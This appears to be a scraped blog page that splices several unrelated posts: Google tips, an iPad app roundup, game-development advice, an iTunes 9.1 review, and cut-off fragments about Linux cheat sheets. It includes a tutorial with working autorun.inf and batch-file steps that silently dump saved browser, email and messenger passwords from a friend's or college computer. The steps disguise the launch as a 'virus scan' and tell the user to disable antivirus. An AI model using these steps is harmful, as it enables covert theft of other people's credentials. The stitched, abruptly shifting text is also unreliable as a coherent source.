Google is amazing (please thank me for this amazing revelation). There are some things you probably didn’t know Google can do. Take your time and read the information below. You’ll likely learn a few tips and tricks that will make you appreciate Google even more.

10. Find a beautiful wallpaper for your desktop resolution with Google images

Here’s how you do it:

Go to Advanced Image Search
Next to “Exact size” click on “Use my desktop resolution”. Then, next to “Content types” select “Photo content.”
Enter some words. If you want to find cows, enter beautiful cows Let’s see the results:

Notice that many of the images in the results are from wallpaper sites. Google Images makes it very convenient to go through these types of sites and browse them like a gallery instead of going to each gallery site separately.

9. Create unlimited disposable email addresses with Gmail

That’s right, you can add one or more dots ANYWHERE between your username and send messages to that ‘new’ email. All of those messages will arrive to your old (without dots) email. Hard to explain without a picture. But somehow Google did find a way to do it…

Hack the passwords using USB PenDrive

Welcome Back to Neev 2 U Today I'm gonna show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friends/college Computer.

We need the following tools to create our rootkit:

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:

ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friends PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you'll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP,Vista and 7

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

There are now over 1,348 approved apps for the iPad. That’s on top of the 150,000 iPad-compatible iPhone programs already available in the App Store. When Apple’s tablet PC launches, just hours from now, it will have a software library greater than that of any handheld in history — not counting the occasional UMPC. That said, the vast majority of even those 1,348 iPad apps are not original. They were designed for the iPhone, a device with a comparatively pokey processor and a tiny screen, and most have just been tweaked slightly, upped in price and given an “HD” suffix — as if that somehow justified the increased cost.

Besides, we’ve seen the amazing potential programs have on iPhone, Android, Blackberry, Windows Mobileand webOS when given access to a touchscreen, always-on data connection, GPS, cloud storage and WiFi — but where are the apps that truly define iPad? What will take advantage of its extra headroom, new UI paradigms and multitouch real estate? Caught between netbook and smartphone, what does the iPad do that the iPhone cannot? After spending hours digging through the web and new iPad section of the App Store, we believe we have a number of reasonably compelling answers.

Mixr DJ turntable - Though the jury’s out on whether iPad-toting disc jockeys will make it past a club bouncer — much less be allowed to spin — Mixr sounds like the app they’d want to use. The program’s creators say multitouch will allow prospective DJs to simply reach out and touch the virtual tables to manipulate knobs, faders, transitions and digital vinyl, and turn the iPad on its side to flip through their “record crate” library of ready albums.

Nota piano trainer – Nota’s no stranger to the App Store; the piano training software received considerable acclaim in an earlier iPhone incarnation, and as far as we know, its laudable features translate directly to the larger screen. So why are we excited to try it on iPad? Simple: now that we can fit more than three fingers on screen, we can actually play the blasted thing. [Via Crave]

Brushes painting application ($10) – Brushes paintings famously made it onto the cover of The New Yorker; now the popular iPhone app wants a faster, larger home. Taking advantage of not only screen size but enhanced processor power, Brushes for iPad allows you to zoom to 3200% (twice as far as its smaller counterpart), store favorite colors as swatches, and watch how your creations came together after the fact in a video replay mode.

Sketchbook Pro painting application ($8) – With the iPad still hours away, it’s impossible to say whether Brushes or Sketchbook Pro is the better painting app, but believe it or not, the latter actually has more brushes — 75 in all — than its close competitor. Both feature color wheels, custom swatches, eyedroppers, six discrete layers and deep multitouch zoom, but a lower price and a professional pedigree (plus the ability to export layered PSD files) might see Sketchbook Pro win the day.

Drawing Pad kids’ coloring book ($2) – It’s not the end results that make Drawing Pad worth a look; with practice, you’ll likely get far better paintings out of apps like Brushes or Sketchbook Pro, regardless of whether you’re six or sixty. No, it’s the childlike wonder that comes from flipping through boxes upon boxes of crayons, markers, stickers and paper, more than you could ever afford, all tucked away neatly in a Mary Poppins-sized drawer. At the current $500 price, few are going to buy their child an iPad — but if Drawing Pad is as good as the above video, we’d certainly pay an extra $2 to let a child play on ours. Organize your business and life

Omnigraffle diagram designer ($50) - Like Sketchbook Pro, Omnigraffle is a piece of professional desktop software migrated to your iPad — but unlike Sketchbook, this app also comes with a professional price. If dropping $50 doesn’t scare you away, however, we could well imagine the ability to turn freehand drawings into quality flow charts, layouts and wireframes would be quite accessible and perhaps even fun on the large, multitouch screen.

iMockups layout designer ($10) – Sure, Omnigraffle covers the bases, but if your visions of a better tomorrow are limited to user interface design, we imagine you might save money and try iMockups instead. Twitepad twitter / web browser integration ($1) – One Twitter app comes up with a new feature, the rest copy it as fast as they can — such is the mobile arms race. On iPad, it’s looking like that feature might be an entire tabbed web browser — because after observing the glory of multi-column multitasking in the above video, we can’t even bear to look our plain jane iPhone’s Tweetie in the eye. Tweetdeck twitter / browser integration (free) - What were we just saying… something about you can expect any iPad Twitter app worth its salt to include a web browser. One of the clients du jour on desktop, TweetDeck is no exception, and unlike that upstart Twitepad, it will actually be out on launch day. Here, the browser and specific Tweets are displayed at the top of the page with two Twitter feeds below, a third accessible when you turn the iPad on its side; plus, you can also view your friends’ tweet locations visually on an integrated Google Map. Mini apps multitasking panel ($1) - The iPad may not have multitasking — at least, not till OS 4.0 — but as we saw with Twitepad above, that doesn’t mean you can’t make a single program do several different things. That’s the entire idea behind Mini apps, a space for you to store and use a whole bunch of Dashboard widgets at the same time. The initial release is limited, giving you only a browser, weather, calculator, sticky notes and NASA’s Image of the Day, but considering you can spawn multiple mini browsers and notes, some might argue that’s plenty — and the developers insist more widgets are on the way. SplitBrowser splitscreen web browser ($2) – We’ve now seen Twitter clients, notepads and widget apps that integrate a web browser, but what about a program that gives you two browsers in one? That’s what SplitBrowser aims to do, and in a rather ingenious way; it gives you control over the dividing line between two browser windows to adjust however you see fit. Since the app almost certainly hasn’t seen a real iPad yet, we’re not sure whether the device can actually handle all that video and multitouch web browsing all at the same time — but even if this particular implementation doesn’t work, we’re definitely sold on the idea.

Read, touch, view, and thereby learn

The Elements: A Visual Exploration interactive science book ($14) - even in its original flat paper form, The Elements got attention for providing stunning photographs and intriguing facts about the 118 elements of the Periodic Table. On the iPad, it’s much more. Tapping on any element yields a rotating 360° view; updated facts from WolframAlpha appear on one side. Objects can be manipulated and thrown about using multitouch, and you can even split images in two to view the elements in stereo 3D — assuming you have a pair of old-school cardboard specs. The publisher isn’t even charging a premium for the interactivity, as the book costs less than its wood pulp analog. Hooray for science!

Wired Magazine digital periodical – the above video is fairly self-explanatory, and completely mind-blowing. When it comes to interactive magazines, Wired has set the example to follow — and should their publisher manage to produce content like that without charging an arm and a leg, they will receive great applause. We’re note sure if Wired itself will be the ticket, but we can’t wait to scrub through magazines like it on a touchscreen, tapping on explanatory videos and even interactive advertisements along the way.

Popular Science+ digital periodical ($5) - Compared to Wired Mag’s demo, Popular Science’s digital edition looks fairly tame — but unlike Wired, this magazine will actually be available at launch. The prototype for publisher Bonnier’s Mag+ platform; expect its simple two-axis, transparency-filled design to be replicated across many magazines if this first issue takes off.

AP News breaking news service (free) - When contemplating how news on a tablet PC would work, most every major news service decided it was time to embrace Negroponte’s Daily Me, and produce an interactive newspaper that looked just like… well, a newspaper. We think the Associated Press has a more interesting take — a program that sorts news by location, hands you headlines, or even just tosses you a stack of pictures to see which catches your fancy before you grab your cup of joe and settle in for a good read.

Skygrid real-time popular news stream (free) – Now here’s an interesting way to sort through news. Rather than give you a single trusted news source or an RSS reader where you can choose your own, SkyGrid claims to provide the most popular news — the news that’s spreading across the web the quickest — with some sort of secret algorithm, displaying headlines on the left and the actual news item on the right. Originally, the company provided a premium financial news aggregator for hundreds of dollars per month; since this one’s free, we’re eager to give it a try.

Kindle bookstore - Amazon’s books may not be as interactive as some of the materials above — yet — but the company’s extensive bookstore itself will be a welcome addition to many iPads, offering not only competition to Apple’s own book prices but — Amazon claims — a variety of features for pleasant reading experiences, too. Bookmark, highlight and annotate, sync your place in a novel with other e-readers, and even adjust the device backlight from inside the application.

Get some friendly tabletop competition

Isocards virtual card deck (free) - The iPad is your card table, your card holders, your scorecard, and your deck of cards. There’s no AI, so you bring your own opponents — and the rules. But just because Isocards isn’t intelligent enough to play against you doesn’t mean it isn’t smartly designed. Multitouch allows you to deal cards to each real-life opponent with a flick of the finger — and keep cards hidden for clandestine play until the app detects you’ve cupped your hand over them for a safe reveal. The creator’s even planning localBluetooth awareness for a future update, so players can drag their cards off the screen, and onto a companion iPhone.

BoardBox board game components ($4) - like Isocards above, Board Box relies on you to provide the opponent — but ensures you’ll never lose a piece in exchange. Fifteen classic board game presets are included alongside granite, mahogany and plastic virtual pieces, but creator Movile says you can mix, match and create your own as well. There’s also an email feature that lets you play online — we’d guess very, very asynchronously — with other Board Box users around the globe. (via Touch Arcade)

Air Coaster XL roller coaster sim ($2) – We know what you’re thinking. We wouldn’t ride that coaster either. But we’d probably have a blast making it using Air Coaster XL’s multitouch 3D interface. One finger rotates, two zoom and three pan the camera in an track editor mode, after which you can either ride or upload it to the shared community server, where someone less inclined to vomit can whip out anaglyph red/blue glasses and experience it in stereoscopic 3D. Real Racing HD racing game ($10) – After condemning thousands of souls to dreams of pastel plane crashes with Flight Control, Australian developer Firemint brought us Real Racing, a game that looked too good for many to believe it was an iPhone title. This is Real Racing in HD. What more do we need to say? We can see Real Racing HD has better graphics; Firemint says it also runs faster, allows you to skin your vehicle with imported photos and play against ghosts, and is cross-compatible with the original iPhone version for WiFi and Bluetooth play.

The Pinball virtual pinball tables — To date, developer Gameprom has released three pinball tables on iPhone to critical acclaim: Jungle Style Pinball, The Deep Pinball and Wild West Pinball. At first, this seems like a simple collection of all three — but where the iPhone apps could only pan across a small section of the table at a time, The Pinball allows you to see the whole high-res table at once, view the action in anaglyph stereoscopic 3D, and even control the game from across the room using your iPhone or iPod Touch as a WiFi remote. The game started life as a Mac title, in case you’re confused by the above video. [Via TUAW]

N.O.V.A. first person shooter game ($10) – Like Real Racing above, N.O.V.A. (Near Orbit Vanguard Alliance) was a fantastic-looking iPhone title that’s more than welcome at the improved 1024 x 768 resolution, especially with iPad-optimized gesture controls. As you can see in the above video, your protagonist can doff a Metroid Prime-esque visor to lock onto multiple enemies with a flick of the finger, swipe two fingers across the screen to toss a grenade, or twist three around the handle of a pressure door to open it for entry.

Need for Speed: Shift racing game ($15) – Not quite as pretty as Australian counterpart Real Racing HD, Need for Speed: Shift nonetheless impresses with improved graphics and touch controls — including the ability to just touch the car to drop into first-person mode and an on-screen shifter you can flick with a thumb for manual gearshifts.

Touchgrind HD miniature skateboarding game ($8) - Touchgrind was a big hit on the iPhone, giving players a fingerboard and a sizable miniature skateboard park filled with rails and jumps to play in. Problem was, on the iPhone you couldn’t see where the heck you were going — but screenshots show that will change drastically on iPad, with Touchgrind HD. If you happened to like playing blind, don’t worry; you can divide that extra real estate in half with a new splitscreen multiplayer mode.

Geometry Wars: Touch shoot ‘em up game ($10) – While gamers were still waiting for decent disc-based Xbox 360 games to arrive back in 2005, they whiled away the hours with a simple but addictive top-down shooter, Geometry Wars, where the player controlled a lone ship in a box of space surrounded by wave after wave of neon foes. Then, the action was controlled with a pair of analog sticks; here, it’s your thumbs in play. Honestly, we’ve always had a soft spot for the underappreciated DS version’s precise touchscreen control even as we mourned its pitiful screen size, so we’ve got high hopes for this one.

Be a couch potato, even without a couch

ABC Player online TV episode viewer (free) – Lost, Castle, Modern Family, Grey’s Anatomy — you can read the above picture — they’re all coming to iPad on launch day. Sure, there’s a catch or three. You’ll need a WiFi connection to use the service, so you’re not going to be able to indulge your secret The Bachelor passion in remote locales over 3G. Also, ABC only plans to offer part of their lineup (we hear 20 shows) and the exact series and episodes offered are of course “subject to change.” We want it anyhow.

Netflix streaming movie app (free) - On iPhone, there were any number of apps that teased us with Netflix functionality, but really only let us manage our DVD queue. On iPad, we’re waiting for the other shoe to drop — but it looks like this time, we’re getting the whole shebang. “Just download this free app and you can instantly watch TV shows & movies streaming from Netflix,” reads the iTunes App Store page. We’ll happily comply.

Yahoo! Entertainment portal and TV guide (free) – If this were only a well-constructed way to manage our TV time, we’d give it a pass — but judging by the screenshots and description, the Yahoo! Entertainment app will be a portal into Yahoo’s considerable news resources as well, letting you watch video clips and read stories from all around Yahoo right on your iPad.

Be somewhere else

iDisplay wireless secondary monitor app ($5) – Drag a program window onto your second monitor, thenpick it up, take it with you, and continue working. That’s what Shape Services is selling with its iDisplay, an app that not only extends your Mac (and eventually Windows) display onto the iPad, but also allows you to interact with content thus moved with multitouch control and the on-screen keyboard. Early reports tell us the technology’s not exactly ready for primetime (read: it crashes a lot) but now that there’s a proof of concept, we’d bet good money it’s only a matter of time before someone gets this idea right. GoToMeeting audio teleconferencing app – Will you really attend important business meetings on an iPad? Depends on your boss, we’d guess. If he or she has a subscription to Citrix System’s GoToMeeting service and is lenient enough to let you use it from your couch though, you’ll might be able to “dial in” to get two-way audio teleconferencing and view entire presentations — Citrix says you can pinch-to-zoom on whatever’s displayed on the speaker’s computer screen — remotely with this app.

Desktop Connect RDP and VNC viewer ($17) – Half those who rated Antecea’s ezDesktop VNC and RDP software on the iTunes App Store gave it a single star, so we don’t have too much hope for the company’s sophomore effort. However, we definitely want what Antecea says it’s selling — an app that will theoretically give us complete tablet control over our Windows, Mac and Linux PCs and even redirect their audio back to the iPad, all from the comfort of our couch cushions.

Wormhole Remote remote desktop viewer ($5) - Wormhole Remote won’t support audio redirection, and will only connect your iPad to Macs running Snow Leopard by launch day, unlike the multiplatform Desktop Connect. Disclaimers out of the way, check out its upside: gesture-based remote control over a streamlined desktop interface that lets you simply flip from one application to the next. Also, this hilariously creepy video.

HSTouchPad home automation controller (free) - But why settle for remote desktop on a PC when you could turn your iPad into a remote control for the entire house? That’s what HomeSeer’s HSTouchPad promises to do. The interface may not look like much in the above screenshot, sure, but if you’ve got a HomeSeer automation system installed, this app gives you live feeds from each camera, touchscreen control over each individual light, temperature control per zone and a home screen which monitors not only the status of your security system, but also weather reports and a RSS feed. One of a number of home automation apps we expect to roll out soon.

Its a good tips for new graduates ,Although directly unrelated to game development, I thought it would be important for me to pass on some valuable wisdom from a fellow newly graduate.

If you’re not convinced that the process of making video games is worth the time and sweat, please allow me to convince you otherwise.

So… Why make video games?

1. To Spread Your Creativity

Don’t tell me you’ve never had a good game idea. Everybody them.

That’s how every single video game in existance started off at one point. By thinking of a fun game concept. The secret to making them come true is opening your mind, and running with the idea (sit down… I meant with your mind).

Afraid your game isn’t going to be popular? If you find the game concept fun, so will millions of other like-minded individuals. That’s why games are so contagious.

The reason video games became so popular is because it gave people an easy means of channeling the product of their fun creativity to others in the world. “I think it would be fun to command a spaceship, and blow up asteroids all day long.” became Asteroids!

If I gave you the means of creating your idea of a perfect game, don’t tell me you wouldn’t want to do so. Your right brain is craving it!

2. To Gain Bragging Rights

What if tommorow, you learn that your best friend is the brains behind the next big mobile phone game.

Don’t put yourself in that position. Take the initiative, and make it first!

You might be suprised at how many positive comments you’ll get once people find out you made a video game. Even my first game, QuickTank, got me alot attention. Just the fact that you’re responsible for somebody else’s entertainement (referring to video games of course), no matter how brief, is a good feeling.

3. To Get A Full Brain Workout

Personal development-wise, game development can turn you into a very well-rounded person. This is probably the reason why most people in the game industry are very down-to-earth.

Even if working on a game project in a team, you’ll most likely be using both halves of your brain to get the ball rolling. By both halves, I’m of course referring to your creativeside, and your logical side.

It requires your creative side because you need to look at the big picture in order to make sure the game turns out fun.

It also requires your logical side because games revolve around rules and variables.

4. To Vanquish Boredom

Not only for you, but for the entire world. Image that kind of responsibility!

By giving people that 15 minute escape from reality, you’re assuring the well being of the human race.

Itunes 9.1 Released, Secrets & Features of iTunes 9.1

In anticipation of this weekend’s United States rollout of the iPad, Apple has released iTunes 9.1, a minor update to last year’s iTunes 9. This new version is designed primarily to provide support for the iPad and its related features such as the iBookstore, but also adds a few other nice enhancements.

The main changes in iTunes 9.1 are highlighted in typically sparse release notes, and include support for the iPad, including iBooks and ePub content and the ability to manage Genius Mixes.

There are, of course, a few more interesting new features hidden under the hood. As usual, we’ve gone through iTunes 9.1 with a fine-toothed comb, and below, we look at what’s new.

Downloading and Installing the Update

As with other iTunes updates, you can either download the new version directly from Apple’s web site at http://www.itunes.comor simply choose “Check for Updates” from the menu in your existing version of iTunes.

The new version weighs in at approximately 94MB. QuickTime has not been updated this time around.

Initial Startup

After upgrading, iTunes 9 will take a few minutes when you first start it to convert your existing iTunes library database to the new format used by iTunes 9.1. As with previous upgrades, a typical iTunes user can expect this to take no more than 5-10 minutes, but if you have a large iTunes library, you will want to allow some time for this to complete—our largest iTunes library took over an hour.

Unlike the extra background processing that occurred with the major iTunes 9 release, once this update is complete iTunes should be ready to go and perform normally.

Keep in mind as well that due to this database upgrade you won’t be able to revert back to a prior version of iTunes without restoring a copy of the database from before the update. iTunes does make its own copy of your previous iTunes library database in your “Previous iTunes Libraries” subfolder, but any changes you’ve made to the database since the upgrade will be lost if you want to go back to the previous version for any reason.

Books

The most notable change in iTunes 9.1 is support for storage and synchronization of eBooks, specifically for the iPad. Rather than adding a separate section, however, Apple has simply re-labelled the “Audiobooks” section to just “Books” and now combines both audiobooks and text-based eBooks in the same sorting area.

As with the Audiobooks section before it, the Books section can be displayed in List, Grid or Cover Flow views. In Grid View, Books and Audiobooks can be grouped into separate sections as shown above or you can choose to group by Author or Category. In List and Cover Flow views, both types of content are mixed together into the same list, although the “Kind” column can be used to differentiate books from audio books.

iTunes 9.1 also lets users import their own ePub-format books from other sources such as Project Gutenberg. ePub files are imported in the same manner as other types of media content—drag and drop into iTunes—then are automatically grouped into the Books section. Books are managed in much the same way as other types of media content as well: the File Info dialog box can also be used to update metadata for Books, and cover artwork can be added in the normal manner.

For Books, the Options page currently only provides one user-settable option: VoiceOver Language, which will presumably be tied to the VoiceOver feature on the iPad itself. Apple has also released a new VoiceOver pack (version 1.3), which signals that iTunes will automatically download pronunciation updates for this feature going forward.

Note that iTunes 9.1 does not provide any support for actually opening ePub files directly on your Mac or PC—these files are stored in iTunes only as a repository for syncing with the iPad and any future devices that may provide support for Apple’s iBooks app.

It is unclear at this time whether the iBookstore will be available through iTunes or only on the iPad. As of this writing it is not yet appearing on the iTunes Store, however Apple may be waiting for the actual launch of iPad before opening the iBookstore. At the very least it seems likely that iBooks purchased on the iPad itself will sync back to iTunes and be displayed and managed in the Books section. We’ll update this section when the iPad is available.

Genius Mixes

First introduced in iTunes 9.0 last fall, Genius Mixes expand upon the earlier Genius Playlists feature by providing longer radio-style mixes of music tracks that go well together. Once your library had been analyzed by the Genius feature, iTunes 9 could automatically generate up to 12 mixes based on different genres.

In iTunes 9, Genius Mixes were fairly static; iTunes would happily create up to 12 mixes but users had no control over the mixes themselves or even their titles. iTunes 9.1 now adds the ability to rename, reorder and even delete Genius Mixes entirely.

Genius Mixes can also now be selected as a source for the iTunes DJ feature, allowing it to draw its track selection from a Genius Mix rather than a playlist or the entire music library.

Convert Higher Bit Rate Songs to 128 kbps AAC

When Apple first released the iPod shuffle in 2005, iTunes added a feature that allowed users to automatically convert higher bit rate tracks down to 128kbps to accommodate the much lower capacity of the iPod shuffle. Since then, many iTunes users have been hoping that Apple would add the same capability for other iPod models and the iPhone.

After five years, iTunes 9.1 finally delivers this feature. All iPod and iPhone models now offer the option to “Convert higher bit rate songs to 128 kbps AAC,” found on their Summary tabs within iTunes.

As with other sync options, this can be enabled on a per-device basis and will simply tell iTunes to automatically convert all files transferred to the iPod to a 128kbps AAC format, allowing users with larger libraries or smaller iPods to potentially fit more music onto their devices. Note that this option only applies to music and does not affect audiobooks, podcasts or video files. Also note that the 128kbps files are created on-the-fly and stored only on the target device and not in the iTunes library itself; enabling this option for multiple devices will require the conversion to be performed separately for each target device.

Note that this conversion option is not available for the Apple TV, which today has as much capacity as the largest iPod, but a much slower synchronization process, and presumably wouldn’t benefit much from conversion for most users.

Sync Screen Changes

iTunes 9.1 also introduces several other minor changes to the synchronization options. This includes a slightly redesigned layout for most of the settings screens which places groups of settings within their own dialog boxes rather than the two-tone shaded areas used in prior versions. iTunes 9 actually introduced this style for certain updated settings screens; iTunes 9.1 unifies this style across all of the sync settings tabs.

Note that iTunes 9.1 also displays iPhone 3GS devices in the Summary page with the screen on, showing an image of a generic home screen. Older iPhone models and all iPod touch devices—even the updated 2009 third-generation iPod touch—continue to show the image with a blank screen.

Apps

The Applications category in the iTunes source list and the sync settings tab for iPhone OS devices have now been condensed to just “Apps,” and the sort options have been moved to a drop-down menu rather than the previous button bar layout. The corresponding “Games” settings for Click Wheel iPod models has not been changed, however.

You can also now choose to see the “Version” column when viewing your Apps category in list mode, which can save a trip to the file info dialog box when you just want to check which version of an app is in your library. You can sort on the Version column in the same way as any other column in iTunes list view, although we’re not really sure what point there would be in doing this.

The View options for the Apps section have also been revised to more accurately reflect app-related information. Artist has been changed to read “Seller,” for example.

Books Syncing

A Books tab now appears in the sync options for all iPod and iPhone devices for managing synchronization of audiobooks. This is likely where you will select eBooks to synchronize to the iPad as well.

The settings on the Books screen work much like the settings for TV Shows; users can choose either specific audiobooks or playlists for synchronization and can select individual parts from multi-part audiobooks. This provides additional flexibility when syncing audiobooks.

The Apple TV settings do not include the separate Books tab, however non-Audible audiobooks can still be synchronized to the Apple TV from the Music settings, as in previous versions of iTunes.

Aperture Support

iTunes has provided basic support for synchronizing photo albums from Apple’s Aperture application since Aperture’s first release. However this support has been quite limited in comparison to the more advanced synchronization options available for iPhoto users. With the release of Aperture 3 earlier this year, iTunes 9.1 has expanded support for synchronizing photos from Aperture. Users of Aperture can now select Faces and recent Projects from their Aperture libraries, and iPhone and iPod touch users can choose to synchronize videos from Aperture to their devices. As with iPhoto, synchronized videos must already be in an iPhone OS compatible format—iTunes will not perform any video conversion during the sync.

iTunes 9.1 now also displays your Aperture or iPhoto albums in a hierarchical view, shown within their appropriate folders and projects.

As with prior versions, iTunes 9.1 displays iPhoto Events in a separate list. Aperture Projects on the other hand are displayed in a hierarchical list alongside Aperture photo albums. Much like iPhoto Events, users can choose to automatically sync recent projects and can select additional projects manually.

Faces and Projects appear on iPod and iPhone devices as standard albums in the same way as Faces and Events from iPhoto. On the Apple TV, Faces are displayed in their own category and Aperture Projects are treated as normal photo albums. This differs from viewing iPhoto content on the Apple TV, where Events are displayed in a separate “Events” section.

iTunes 9.1 also preserves any custom sort ordering set within photo albums from an Aperture library. In prior versions, Aperture albums were always sorted by date.

Unlike iPhoto, Aperture Slideshows cannot be synced to the Apple TV, even as static photo albums—they simply do not appear in the list. iTunes 9.1 continues to allow iPhoto users to sync their slideshows to the Apple TV, including custom transition and playlist settings. As before, syncing videos to the Apple TV from either iPhoto or Aperture is not supported.

Aperture photos will also not display the date taken when browsing photos on the Apple TV or iPod classic. Aperture Albums display no date at all, while Aperture Projects display only the date that project was imported into Aperture. By comparison when browsing iPhoto content on these devices, the actual date taken is displayed at the top of the screen for each photo.

Support for syncing Places information from either iPhoto or Aperture is not available on current iPod, iPhone or Apple TV devices. The iPad will include Places support although it is not yet clear whether iTunes will implement Places as separate sync categories for the iPad or simply transfer the location information as metadata for the iPad itself to sort out. We’ll update this with more information once the iPad is released.

iPad Remote

Very little has changed in the Preferences in iTunes 9.1, with most of the changes related to terminology such as Audiobooks being replaced with “Books” and Applications being renamed “Apps” on the General tab, and references to the iPad on the Devices tab. One setting of note on the Devices tab, however, is the option to “Look for iPod touch, iPhone and iPad Remotes.”

While it is possible that this may simply indicate that the existing Remote app will also run on the iPad, with the specific reference to “iPad Remote” it seems more likely that Apple plans to release an iPad-optimized Remote app rather than forcing iPad users to rely on the non-optimized iPhone Remote app.

Other Minor Changes

The iTunes Advanced Preferences screen has a new option, Reset iTunes Store Cache. No help is provided on this option, but presumably this clears any cached iTunes Store interface information within iTunes and is likely useful primarily as a diagnostic tool for users who may be having problems accessing the iTunes Store.

The Group Compilations when Browsing option has disappeared from the Advanced Preferences as well, although is is still referenced in the iTunes Help file.

UPDATE: The Group Compilations option is now found on the View menu in iTunes under the Column Browser submenu. This works in the same way as the preference option did, and allows you to toggle it on and off more easily. Thanks to Doug Adams for pointing this out in the comments.

The Column Browser submenu now also contains a setting to Use Album Artists. When enabled, the Album Artist field is used to group tracks instead of the Artist field. This can be particularly useful for albums that include featured or alternate artists as they can now all appear under a single artist entry when browsing the library while still retaining their actual artist information in the individual tracks.

The Show Duplicates option on the File menu has been renamed Display Duplicates. It functions the same as in prior versions, however.

New options can now be found on the Control menu to Increase and Decrease Volume along with corresponding keyboard shortcuts.

What still hasn’t changed - iPhone Manual Mode

Each time an iTunes update comes out we receive a flurry of e-mails from readers asking us if Apple has finally fixed certain longstanding problems such as the ability to manually manage the media content on an iPhone from more than one computer. Sadly, iTunes 9.1 and iPhone OS 3.1.3 still have not addressed this issue.

The inability to manually manage the media content on an iPhone from more than one computer continues to be a source of frustration for many of our readers and one of the oddest limitations we’ve seen in iTunes. For many users this keeps the iPhone from being entirely usable as an iPod. It is obvious at this stage that this is a deliberate design decision on Apple’s part, and one that it is for some reason refusing to fix for the benefit of users.

More importantly, this makes us wonder whether the iPad will suffer from a similar limitation or will function more like the iPod touch. It is worth noting that with the iPhone there is an additional licensing restriction that prevents ringtones from being loaded from more than one iTunes library, which may indirectly contribute to this limitation. The iPod touch and iPad do not support ringtone capabilities and are therefore not bound by this restriction.

Performance

iTunes 9.1 contains no noticeable performance improvements from the previous version on either Windows or Mac OS X. It remains a 32-bit application and memory usage and utilization appear to be the same in the new version as in iTunes 9.

Update or Wait?

If you’re planning to buy an iPad, the answer to this question is obvious as you will need the newest version of iTunes to support the iPad. For other users, the main benefits of this update seem to be support for converting songs on-the-fly during sync and improved support for the new features in Aperture 3. The new separate Audiobooks syncing options may also be of interest to Audiobook enthusiasts.

Other new features are more minor in scope and there’s nothing else here that would make the average user rush out and download this update. The good news, however, is that we haven’t seen anything in iTunes 9.1 that suggests you shouldn’t update. For all intents and purposes it continues to work much the same as iTunes 9 did.

This is my first post on Cheat sheets. Actually Cheat sheet is a concise set of notes used for quick reference. Cheat sheets will contain most of the shortcuts needed to program faster. And it is meant for newbie users who can’t remember the shortcuts or commands.

In this post , I have collected almost 27 Cheat sheets available for Linux users. These Cheat sheets will contain Linux command lines, Linux security, Linux administration, Gnome/KDE, sed/awk/vim, and distribution specific codes.

You may think that one cheat sheet is just enough for me , so why should I need to look at so many cheat sheets. This Office Suite is Portable in the following sense:

It is a simple zip file => unzip, copy and paste to your thumb drive, memory stick, flash drive, or hard drive
